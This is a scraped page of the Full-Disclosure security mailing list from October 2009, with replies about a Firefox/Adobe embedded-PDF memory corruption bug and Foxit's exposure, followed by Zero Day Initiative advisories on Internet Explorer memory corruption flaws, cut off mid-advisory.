jrgIJKTCYR67EJPuUu31QFWWpp/qIBBAN3ragqXhq5lQxpOxnWohZ0E1kCB9BdIH BIqZW8Laa62IkGH4ZVDhwwek883m7QzJCGUVOrWt5e02QaZoX9D2ompW2Od6FwJJ Ro1wlm1bgVPXNhCPJ+Ohq41F96X8S0a9OHlnUwV88EicFwV0Fu9c6Q== =H/jn -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Memory corruption when loading/unloading Adobe objects through EMBED tag in Firefox
Ah, okay. I do that anyway, because I've had bad experiences with Firefox crashing when displaying embedded PDFs in the past. Sounds like I should be okay until Foxit updates its reader. Thanks, Rohit Patnaik On Tue, Oct 13, 2009 at 8:15 PM, mrx m...@propergander.org.uk wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Adobe has fixed this issue http://www.adobe.com/support/security/bulletins/apsb09-15.html And as this bug relates to Firefox rendering embedded COM objects (PDF) inside a browser window. It should be safe to view PDF's inside both Adobe and Foxit readers whilst offline. MrX Rohit Patnaik wrote: Are there any available workarounds that would mitigate the threat? I suppose I could just upload all my PDFs to Google Docs in the meantime, but I'm looking for something that I could use while offline... --Rohit Patnaik On Tue, Oct 13, 2009 at 7:35 PM, mrx m...@propergander.org.uk wrote: No, I installed latest updates prior to testing. They should be aware of this however considering what appear to be striking similarities in the code base between Foxit and Adobe readers, at least as far as shared bugs go. If not they will be aware of this after they read the email I sent them. MrX Rohit Patnaik wrote: Has Foxit released an update for this? --Rohit Patnaik On Tue, Oct 13, 2009 at 6:40 PM, mrx m...@propergander.org.uk wrote: It would appear that Foxit reader version 3.1.1.0928 is also vulnerable to this memory corruption flaw. Foxit reader was also vulnerable to the JPEG2000/JBIG2 decoder bug. Makes me wonder how much code is common to both Adobes and Foxits PDF readers MrX Berend-Jan Wever wrote: Adobe bulletin: http://www.adobe.com/support/security/bulletins/apsb09-15.html Short description and repro case: http://skypher.com/index.php/2009/10/13/memory-corruption-when-loadingunloading-adobe-objects-through-embed-tag-in-firefox/ Cheers, SkyLined http://skypher.com/index.php/2009/10/13/memory-corruption-when-loadingunloading-adobe-objects-through-embed-tag-in-firefox/ Berend-Jan Wever berendjanwe...@gmail.com http://skypher.com/SkyLined -- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQEVAwUBStUmKrIvn8UFHWSmAQLvGgf/ZUENmHdfks44uiGTreeEAMkAtcJ0DmYB /CyHB6omJWnSWIyxUrClcIU62eK1Oue698BjIG1hiyquqFSbnLqzivhB4OSvneYH 8aQodO4gdCO8vwSaQenxO9hk1HPE8RJN9Ds5QqvPZ7qDdhEvdVeaCDyBgn4kERz/ jrgIJKTCYR67EJPuUu31QFWWpp/qIBBAN3ragqXhq5lQxpOxnWohZ0E1kCB9BdIH BIqZW8Laa62IkGH4ZVDhwwek883m7QzJCGUVOrWt5e02QaZoX9D2ompW2Od6FwJJ Ro1wlm1bgVPXNhCPJ+Ohq41F96X8S0a9OHlnUwV88EicFwV0Fu9c6Q== =H/jn -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Memory corruption when loading/unloading Adobe objects through EMBED tag in Firefox
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 I should have made it clear in my first response to this thread that it is the Foxit Firefox plugin that is vulnerable and not the standalone reader. my bad MrX Rohit Patnaik wrote: Ah, okay. I do that anyway, because I've had bad experiences with Firefox crashing when displaying embedded PDFs in the past. Sounds like I should be okay until Foxit updates its reader. Thanks, Rohit Patnaik On Tue, Oct 13, 2009 at 8:15 PM, mrx m...@propergander.org.uk wrote: Adobe has fixed this issue http://www.adobe.com/support/security/bulletins/apsb09-15.html And as this bug relates to Firefox rendering embedded COM objects (PDF) inside a browser window. It should be safe to view PDF's inside both Adobe and Foxit readers whilst offline. MrX Rohit Patnaik wrote: Are there any available workarounds that would mitigate the threat? I suppose I could just upload all my PDFs to Google Docs in the meantime, but I'm looking for something that I could use while offline... --Rohit Patnaik On Tue, Oct 13, 2009 at 7:35 PM, mrx m...@propergander.org.uk wrote: No, I installed latest updates prior to testing. They should be aware of this however considering what appear to be striking similarities in the code base between Foxit and Adobe readers, at least as far as shared bugs go. If not they will be aware of this after they read the email I sent them. MrX Rohit Patnaik wrote: Has Foxit released an update for this? --Rohit Patnaik On Tue, Oct 13, 2009 at 6:40 PM, mrx m...@propergander.org.uk wrote: It would appear that Foxit reader version 3.1.1.0928 is also vulnerable to this memory corruption flaw. Foxit reader was also vulnerable to the JPEG2000/JBIG2 decoder bug. Makes me wonder how much code is common to both Adobes and Foxits PDF readers MrX Berend-Jan Wever wrote: Adobe bulletin: http://www.adobe.com/support/security/bulletins/apsb09-15.html Short description and repro case: http://skypher.com/index.php/2009/10/13/memory-corruption-when-loadingunloading-adobe-objects-through-embed-tag-in-firefox/ Cheers, SkyLined http://skypher.com/index.php/2009/10/13/memory-corruption-when-loadingunloading-adobe-objects-through-embed-tag-in-firefox/ Berend-Jan Wever berendjanwe...@gmail.com http://skypher.com/SkyLined -- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQEVAwUBStUp5LIvn8UFHWSmAQJGBwgAn3ZlC2bLq6PfJPZWK5YhCuRECQhIpgUS tp34qfKay5dyS/t7vpZNEJcd/DVC8rG9yPfqNYeg5qpwyCUrCAsp/+vYQVdTKM4q zntupFr1jyaWHvovhMNZv2rateQh7EzIsCV9NJuD4IC5LD6IRuyg/EpATAUEvd42 Gu5Syx3HyaEF9KFxoU6MHh4o+mVCR4BpJ6p7daLqXsvVZw5F06qqNaNxE3YnjwBe Edv6V7BOOru1BijDhoAE93lXhxTUKeLXtb7S/3/MMFw1zuKVphH0m6a03/qvo9CL v3lS9F4680EOLJTjkRLTQzvXvL76dW3Zkb0SSAUxRjp294LfIN4Qjw== =yfzU -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ZDI-09-070: Microsoft Internet Explorer Event Object Type Double-Free Vulnerability
This vulnerability can affected IE8?Isn't it mean that can bypass DEP+ASLR? Message: 14 Date: Tue, 13 Oct 2009 14:24:43 -0500 From: ZDI Disclosures zdi-disclosu...@tippingpoint.com Subject: [Full-disclosure] ZDI-09-070: Microsoft Internet Explorer Event Object Type Double-Free Vulnerability To: Bugtraq (bugt...@securityfocus.com) bugt...@securityfocus.com, Full Disclosure (full-disclosure@lists.grok.org.uk) full-disclosure@lists.grok.org.uk Message-ID: ee499d69b3d0714590b6fe9762b046110381100...@emb01.unity.local Content-Type: text/plain; charset=us-ascii ZDI-09-070: Microsoft Internet Explorer Event Object Type Double-Free Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-09-070 October 13, 2009 -- CVE ID: CVE-2009-2530 -- Affected Vendors: Microsoft -- Affected Products: Microsoft Internet Explorer 6 Microsoft Internet Explorer 7 Microsoft Internet Explorer 8 -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 8653. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page. The specific flaw exists within the copy constructor for a specific DOM object. When duplicated, more than one reference can be made of anything assigned to it's properties. When the variable/object goes out of scope, these properties will be deallocated twice. This results in a heap corruption which can lead to code execution under the context of the current user. -- Vendor Response: Microsoft has issued an update to correct this vulnerability. More details can be found at: http://www.microsoft.com/technet/security/bulletin/ms09-054.mspx -- Disclosure Timeline: 2009-06-23 - Vulnerability reported to vendor 2009-10-13 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Anonymous * Anonymous -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ -- Message: 15 Date: Tue, 13 Oct 2009 14:24:45 -0500 From: ZDI Disclosures zdi-disclosu...@tippingpoint.com Subject: [Full-disclosure] ZDI-09-071: Microsoft Internet Explorer writing-mode Memory Corruption Vulnerability To: Bugtraq (bugt...@securityfocus.com) bugt...@securityfocus.com, Full Disclosure (full-disclosure@lists.grok.org.uk) full-disclosure@lists.grok.org.uk Message-ID: ee499d69b3d0714590b6fe9762b046110381100...@emb01.unity.local Content-Type: text/plain; charset=us-ascii ZDI-09-071: Microsoft Internet Explorer writing-mode Memory Corruption Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-09-071 October 13, 2009 -- CVE ID: CVE-2009-2531 -- Affected Vendors: Microsoft -- Affected Products: Microsoft Internet Explorer 6 Microsoft Internet Explorer 7 Microsoft Internet Explorer 8 -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 8654. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer. User interaction is required in that a user must visit a malicious web page. The specific flaw exists in the parsing of CSS style information. When a writing-mode style is
